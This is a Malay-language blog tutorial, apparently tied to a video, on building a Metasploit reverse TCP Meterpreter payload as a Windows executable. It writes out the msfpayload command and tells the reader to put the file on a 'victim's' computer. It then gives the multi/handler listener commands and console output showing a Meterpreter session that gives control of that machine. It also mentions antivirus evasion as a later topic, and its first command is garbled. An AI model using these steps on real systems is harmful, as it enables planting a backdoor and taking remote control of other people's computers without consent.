SUBJEK YANG TERDAPAT DI DALAM ARTIKEL SANGAT SUKAR DIFAHAMI,ANDA PERLULAH MEMAHAMI PERKARA ASAS TERLBIH DAHULU
Dalam video ini, saya tunjukkan kepada anda bagaimana untuk membuat asas reverse TCP payload dalam metasploit
"Metasploit menyediakan maklumat yang berguna dan pentesting, penyelidik keselamatan, dan pemajutandatangan IDS. Projek ini telah diwujudkan untuk memberi maklumat mengenai teknik-teknik mengeksploitasi dan untuk mewujudkan pengetahuan yang berfungsi untuk pemaju mengeksploitasi dan profesional keselamatan. Alat dan maklumat di dalam laman web ini disediakan untuk penyelidikan keselamatan undang-undang dan tujuan ujiansahaja. Metasploit adalah projek sumber terbuka. "
http://www.metasploit.com/
Program ini boleh digunakan pada Windows dan Linux (saya cuba guna pada Windows dan membenci) dan dikemas kini setiap hari
Salah satu program, percuma untuk pentesting /exploit
Dalam video ini menunjukkan kepada anda bagaimana untukmenggunakan program dalam Linux
Pada video ini
saya tunjukkan kepada anda asas Reverse_tcp payload. Buka terminal dan taipkan "./msfpayload/windows/meterpreter/reverse_tcp LHOST=<ip anda> LPORT=4444> x> /root/<file.exe>
Penerangan
LHOST adalah alamat dimana exe akan bersambung suma kepada samaada melalui ip luaran atau dalaman. Untuk mengetahui alamat IP dalaman anda pada linux ,hanya perlu buka terminal (CTRL+ALT+T) dan taip ifconfig dan anda akan dapat lihat sendiri
LPORT
LPPORT adalah port exe kamu akan bersambung balik kepada anda dan memastikan ianya menghatar data dengan tepat
pada baris "x> /root/<file.exe>" ianya adalah asas yang menyatakan exe adalah x dan meletakkanya pada root/file.exe.
File .exe hanya akan berkesan pada Windows
" ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.66 LPORT=4444 x > /root/reverse_tcp.exe "
terdapat arahan tambahan yang oleh menyembunyikan dari AV (anti virus), tetapi saya akan tulis pada artikel akan datang kerana ini hanyalah asas, dan bagaimana untuk lakukanya
Seterusnya copy file.exe yang telah kamu buat dan letakkan pada komputer mangsa
Jadi kita perlu buka listener supaya file.exe akan bersambung semula supaya kita dapat session
buka metasploit console (msfconsole) dan taipkan ini
"use multi/handler"
"set PAYLOAD windows/meterpreter/reverse_tcp"
"set LHOST 192.168.1.1"
"set LPORT 4444"
"exploit"
akan keluar
msf > use multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.1 LHOST => 192.168.1.1 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > exploit [*] Started reverse handler [*] Starting the payload handler... |
Sekarang kita telah dapat Listening server, menunggu untuk disambung semula. Perlu diingatkan LHOST dan LPORT tetapan anda sendiri
Apabila file.exe telah diklik akan keluarlah :
msf exploit(handler) > exploit [*] Started reverse handler on port 4444 [*] Starting the payload handler... [*] Sending stage (72346 bytes) [*] Sleeping before handling stage... [*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.2:1060) meterpreter > |
Sekarang kita telah dapat meterpreter session adan dapat kawal segalanya
Tutorial akan datang, saya akan menunkkan anda bagaimana menggunakan arahan meterpreter
Tiada ulasan:
Catat Ulasan